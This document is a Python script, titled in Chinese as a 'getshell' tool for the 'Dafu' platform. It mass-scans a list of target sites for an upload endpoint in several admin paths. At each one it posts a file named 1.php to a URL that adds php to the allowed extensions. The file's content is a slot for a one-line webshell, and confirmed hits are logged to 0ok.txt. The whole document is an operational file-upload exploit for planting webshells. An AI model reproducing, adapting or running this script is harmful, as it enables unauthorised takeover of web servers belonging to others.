BC大富getshell脚本

#!/usr/bin/env python
# coding:utf-8

import requests
import json
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # 彻底移除SSL认证,HTTPS警告

shell = '''这里写入一句话木马'''

class DafuGetShell(object):

def _init__(self,):
pass

def Parse_url(self,arg):
print(arg)
''' Url处理函数 '''
import sys
if sys.version_info < (3, 0):
import urlparse
if arg.startswith("http"):
result = urlparse.urlparse(arg)
else:
result = urlparse.urlparse('http://%s' % arg)
else:
from urllib.parse import urlparse
if arg.startswith("http"):
result = urlparse(arg)
else:
result = urlparse('http://%s' % arg)
if result.port is None and result.scheme == 'https':
port = 443
elif result.port is None and result.scheme == 'http':
port = 80
else:
port = result.port
if port == 443:
scheme = 'https'
else:
scheme = 'http'
return result.scheme+"://"+result.hostname+":"+str(port)

def checkweak(self,url):
boundary = '---------------------------18467633426500'
data = []
#data.append('\r\n')
data.append('--%s' % boundary)
data.append('Content-Disposition: form-data; name="imgFile"; filename="1.php"')
data.append('Content-Type: %s\r\n' % ' text/plain')
data.append(shell)
data.append('--%s--\r\n' % boundary)
http_body = '\r\n'.join(data)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Content-Type':'multipart/form-data; boundary=---------------------------18467633426500',
}
r = requests.post(url+"Uploads.upload.allowext.gif%7Cjpg%7Cjpeg%7Cphp%7Cpng%7Cbmp.size.2.do?dir=uploads", data=http_body,headers=headers,verify=False,timeout=5)
ret = r.content
if '"error":0' in str(ret) and 'uploads' in str(ret.lower()):
return "[+] Getshell "+url+"\r"+ret


def audit(self,arg):
adminpath = ['/admin/Admincenter/','/aaa/Admincenter/','/wwwroot/Admincenter/','/admin/','/Admincenter/',"/"]
for i in adminpath:
url = arg+i

try:
weak = self.checkweak(url)
if weak:
print("找到漏洞地址:%s"%(weak))
file = open('0ok.txt','a')
file.write("找到漏洞地址:%s\r\n"%(weak))
file.close()

except Exception as error:
print(error)

if __name__ == "__main__":
try:
if not sys.argv[1]:
pass
except:
print("Use: python getdafu.py [文件名.txt]")
exit()
openfile=open(sys.argv[1])
for lines in openfile.readlines():
line = lines.strip()
_ = DafuGetShell().audit(DafuGetShell().Parse_url(line))